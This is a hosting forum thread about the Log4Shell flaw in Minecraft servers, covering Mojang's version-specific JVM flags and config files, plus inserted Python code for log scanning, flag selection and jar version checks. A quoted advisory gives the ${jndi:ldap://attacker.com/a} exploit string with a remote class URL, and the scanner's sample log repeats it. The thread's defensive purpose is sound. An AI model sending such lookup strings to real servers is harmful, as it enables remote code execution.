qspider Posted December 10, 2021
I just saw some news about a JAVA critical security threat found in Minecraft. They are saying to restart the launcher and it will fix the issue. Does anyone know if anything needs to be done on the server side? Seems more client related.
qspider (Author) Posted December 10, 2021
Adding -Dlog4j2.formatMsgNoLookups=true to the commandline may fix the issue for versions 1.12+.
qspider (Author) Posted December 10, 2021
Also adding a white list. It appears public servers are high risk for this vulnerability.
eyup51 Posted December 10, 2021
Many forks have updated (for versions 1.8 and higher) on this. If you are using forks like Spigot or Paper, you should update. Server users should consider what I mentioned above.
Edited December 10, 2021 by eyup51
Dennis Posted December 10, 2021
Please note: The TCAdminCrons plugin (https://community.tcadmin.com/files/file/59-tcadmincrons/) uses ServerJars to get updates. ServerJars has not compiled patched versions yet, and I'm not sure they are going to (at least for old versions). If you provide patched versions, you will need to remove all affected versions from TCAdmin and run the TCAdminCrons plugin again. The plugin will not overwrite existing updates in TCAdmin.
Also, as far as I understand, this is not a security issue for your servers. It affects clients, not servers. If I'm wrong, please tell me.
qspider (Author) Posted December 10, 2021
10 hours ago, Dennis said:
Also, as far as I understand, this is not a security issue for your servers. It affects clients, not servers. If I'm wrong, please tell me.
The way I'm reading this it affects all Minecraft servers using Java 8 and above. User injects code through console and it gets logged. Exploit process begins. I could be wrong though.
https://www.lunasec.io/docs/blog/log4j-zero-day/
Exploit Steps
1. Data from the User gets sent to the server (via any protocol),
2. The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server),
3. The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI),
4. This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process,
5. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
Exploit Requirements
A server with a vulnerable log4j version (listed above), an endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send the exploit string, and a log statement that logs out the string from that request.
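The exploit steps quoted above boil down to one thing a server operator can watch for: a Log4j lookup string (`${jndi:...}`) arriving in player-supplied data and being logged by the server. The following detector is an added example written for this thread, not code from TCAdmin, Mojang or the lunasec post; the log lines it scans are constructed to look like vanilla server output and the host name is a placeholder. It flags a direct `${jndi:` indicator as high severity and, as a cheaper heuristic, any Log4j lookup syntax inside a player chat line as medium severity, since ordinary chat has no reason to contain `${`.

```python
import re
from typing import Dict, List, Optional

# Constructed sample of vanilla-style server log lines (not taken from the thread).
# "attacker.example" is a placeholder host, not a real indicator.
SAMPLE_LOG = """\
[12:01:03] [Server thread/INFO]: Steve joined the game
[12:01:10] [Server thread/INFO]: <Steve> hello everyone
[12:01:15] [Server thread/INFO]: <Alex> ${jndi:ldap://attacker.example/a}
[12:01:20] [Server thread/INFO]: <Bob> my build costs ${diamonds}
[12:01:25] [Server thread/INFO]: Alex lost connection: Disconnected
"""

# Direct Log4Shell indicator: a jndi lookup with any scheme, case-insensitive,
# tolerating whitespace between the braces and the lookup name.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Vanilla chat lines look like "[time] [Server thread/INFO]: <player> message".
CHAT_RE = re.compile(r"\]: <(?P<player>[^>]+)> (?P<msg>.*)$")

# Any Log4j lookup syntax at all; legitimate chat does not need it.
LOOKUP_RE = re.compile(r"\$\{")


def _player(line: str) -> str:
    """Player name from a chat line, or '' for non-chat lines."""
    m = CHAT_RE.search(line)
    return m.group("player") if m else ""


def classify_line(line: str) -> Optional[Dict[str, str]]:
    """Return a verdict dict for a suspicious line, or None for a benign one."""
    if JNDI_RE.search(line):
        return {"severity": "high",
                "reason": "jndi lookup in logged data",
                "player": _player(line)}
    m = CHAT_RE.search(line)
    if m and LOOKUP_RE.search(m.group("msg")):
        return {"severity": "medium",
                "reason": "lookup syntax in player chat",
                "player": m.group("player")}
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Scan a whole log; each hit carries its 1-based line number as a string."""
    hits: List[Dict[str, str]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        verdict = classify_line(line)
        if verdict:
            verdict["line"] = str(lineno)
            hits.append(verdict)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['severity']:6} {hit['player']!r}: {hit['reason']}")
```

A hit tells you which player account sent the string and when, which is what you need to ban the account and check the server's outbound connections around that timestamp; it does not tell you whether the lookup actually fired, so a high-severity hit on a server that was unpatched at the time should be treated as a probable compromise, not just an attempt.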
Spillvert.no Posted December 13, 2021
On 12/10/2021 at 11:38 AM, Dennis said:
Also, as far as I understand, this is not a security issue for your servers. It affects clients, not servers. If I'm wrong, please tell me.
Mojang is indeed urging Java server owners to take steps: https://www.minecraft.net/nb-no/article/important-message--security-vulnerability-java-edition
Adam Posted December 13, 2021
Quote:
Summary of the instructions:
- If possible please update to 1.18.1, if you're not able to do so, please follow the same approach as Minecraft 1.17.X
- Minecraft 1.17.X: Add the following JVM arguments to your startup command line: -Dlog4j2.formatMsgNoLookups=true
- 1.12-1.16.5: Download this file (https://launcher.mojang.com/v1/objects/02937d122c86ce73319ef9975b58896fc1b491d1/log4j2_112-116.xml) to the working directory where your server runs. Then add the following JVM arguments to your startup command line: -Dlog4j.configurationFile=log4j2_112-116.xml
- 1.7-1.11.2: Download this file (https://launcher.mojang.com/v1/objects/dd2b723346a8dcd48e7f4d245f6bf09e98db9696/log4j2_17-111.xml) to the working directory where your server runs. Then add the following JVM arguments to your startup command line: -Dlog4j.configurationFile=log4j2_17-111.xml
- Versions below 1.7 are not affected
You guys can make different commandlines with the different flags.
Edited December 13, 2021 by SHAD0WRAIDERZA
Spillvert.no Posted December 13, 2021
Absolutely this can be fixed for the pre-built packs and versions you provide in TCA. However, in real life it is not that easy to enforce this fix when users are able to upload and run any version of MC and older pre-built modpacks. And the Updates do not allow for custom commandlines, so it needs to be scripted for every update. The panel needs to know what version the server is on and apply the correct startup variable. If the wrong command is used (ex: -Dlog4j2.formatMsgNoLookups=true on a 1.16 server) it will fail to start.
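The version table quoted from Mojang two posts up, and the point just made about needing the right startup variable for each version, can be turned into a single selector that a panel or startup script consults before launching the server. This is an added example for this thread, not TCAdmin or Mojang code; the version ranges, JVM flags, file names and download URLs are exactly the ones in the quoted instructions, and the `build_command` defaults (`server.jar`, `-Xmx2G`, `nogui`) are assumptions. Because the two older ranges point the JVM at a config file that must already be in the working directory, `missing_files` reports the pre-flight failure that would otherwise surface as a server that refuses to start.

```python
from typing import List, NamedTuple, Set, Tuple

# Download URLs and version ranges as published by Mojang (quoted above in this thread).
LOG4J_CFG_112_116 = ("https://launcher.mojang.com/v1/objects/"
                     "02937d122c86ce73319ef9975b58896fc1b491d1/log4j2_112-116.xml")
LOG4J_CFG_17_111 = ("https://launcher.mojang.com/v1/objects/"
                    "dd2b723346a8dcd48e7f4d245f6bf09e98db9696/log4j2_17-111.xml")


class Mitigation(NamedTuple):
    jvm_args: List[str]   # extra arguments to put on the startup command line
    download_url: str     # file that must be placed in the working directory, or ""
    note: str


def parse_version(version: str) -> Tuple[int, int, int]:
    """'1.16.5' -> (1, 16, 5); '1.17' -> (1, 17, 0). Pre-release suffixes are not handled."""
    parts = [int(p) for p in version.strip().split(".")]
    while len(parts) < 3:
        parts.append(0)
    return parts[0], parts[1], parts[2]


def mitigation_for(version: str) -> Mitigation:
    """Pick the Log4Shell mitigation Mojang prescribes for a given server version."""
    v = parse_version(version)
    if v >= (1, 18, 1):
        return Mitigation([], "", "1.18.1 ships a patched log4j; nothing to add")
    if v >= (1, 17, 0):   # 1.17.x, and 1.18.0 follows the 1.17 approach
        return Mitigation(["-Dlog4j2.formatMsgNoLookups=true"], "",
                          "disable message lookups via JVM property")
    if v >= (1, 12, 0):
        return Mitigation(["-Dlog4j.configurationFile=log4j2_112-116.xml"],
                          LOG4J_CFG_112_116, "replacement log4j2 config for 1.12-1.16.5")
    if v >= (1, 7, 0):
        return Mitigation(["-Dlog4j.configurationFile=log4j2_17-111.xml"],
                          LOG4J_CFG_17_111, "replacement log4j2 config for 1.7-1.11.2")
    return Mitigation([], "", "versions below 1.7 are not affected")


def missing_files(version: str, present: Set[str]) -> List[str]:
    """Config files the chosen mitigation needs that are not in the working directory."""
    m = mitigation_for(version)
    if not m.download_url:
        return []
    needed = m.download_url.rsplit("/", 1)[-1]
    return [] if needed in present else [needed]


def build_command(version: str, jar: str = "server.jar", xmx: str = "2G") -> List[str]:
    """Assemble the java command line with the version-appropriate mitigation flags."""
    m = mitigation_for(version)
    return ["java", f"-Xmx{xmx}", *m.jvm_args, "-jar", jar, "nogui"]


if __name__ == "__main__":
    for ver in ("1.18.1", "1.17.1", "1.16.5", "1.8.8", "1.6.4"):
        m = mitigation_for(ver)
        print(ver, "->", " ".join(build_command(ver)), "|", m.note)
        for f in missing_files(ver, set()):
            print("   needs", f, "from", m.download_url)
```

Run `missing_files` against a listing of the server's working directory before starting it; if it returns anything, download that file first rather than starting with a `-Dlog4j.configurationFile` flag that points at nothing.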
Dennis Posted December 13, 2021
The config I've built for Minecraft can already somewhat automatically detect the version of Minecraft being started. I'll see if I can get these things implemented so TCAdmin secures the server before startup.
Dennis Posted December 13, 2021
I might've spoken too soon. We detect the version of Java required based on the headers in the .class files. There doesn't seem to be an easy way of knowing what version of Minecraft a specific jar file is. I can find it by manually searching the class files, but automating this process is almost impossible.
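For readers who want to see what "the headers in the .class files" gives you: every class file starts with the magic `0xCAFEBABE`, a two-byte minor version and a two-byte major version, and the major version maps to the Java release the class needs (52 is Java 8, 61 is Java 17). The code below is an added example, not TCAdmin's code; it reads just those eight bytes from each `.class` entry in a jar and reports the highest Java release required. The sample jar it builds is constructed in memory from fake eight-byte class headers with placeholder package names, so it runs offline. As the post says, this yields the Java version, not the Minecraft version.

```python
import io
import struct
import zipfile
from typing import Dict, Optional

# Class-file major_version -> Java release that introduced it (JVM specification table).
JAVA_BY_MAJOR: Dict[int, str] = {
    49: "5", 50: "6", 51: "7", 52: "8", 53: "9", 54: "10", 55: "11",
    56: "12", 57: "13", 58: "14", 59: "15", 60: "16", 61: "17", 62: "18",
}


def class_major_version(header: bytes) -> int:
    """Return the major_version field from the first 8 bytes of a .class file."""
    if len(header) < 8:
        raise ValueError("truncated class file header")
    magic, _minor, major = struct.unpack(">IHH", header[:8])
    if magic != 0xCAFEBABE:
        raise ValueError("not a Java class file")
    return major


def required_java_for_jar(jar_bytes: bytes) -> Optional[str]:
    """Highest Java release any .class entry in the jar needs, or None if it has no classes."""
    highest = 0
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".class"):
                continue
            with zf.open(name) as f:
                highest = max(highest, class_major_version(f.read(8)))
    if highest == 0:
        return None
    return JAVA_BY_MAJOR.get(highest, f"unknown (major {highest})")


def fake_class(major: int) -> bytes:
    """Constructed 8-byte header only (magic, minor=0, major); enough for the check above."""
    return struct.pack(">IHH", 0xCAFEBABE, 0, major)


def build_sample_jar() -> bytes:
    """Constructed in-memory jar with two Java 8 classes and a manifest; placeholder names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("net/example/Main.class", fake_class(52))
        zf.writestr("net/example/Util.class", fake_class(52))
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    return buf.getvalue()


if __name__ == "__main__":
    print("sample jar needs Java", required_java_for_jar(build_sample_jar()))
```

Point `required_java_for_jar` at the bytes of a real server jar to get the same answer a panel would; a jar whose classes need a newer Java release than the host has installed will not start regardless of which Log4Shell flag you add.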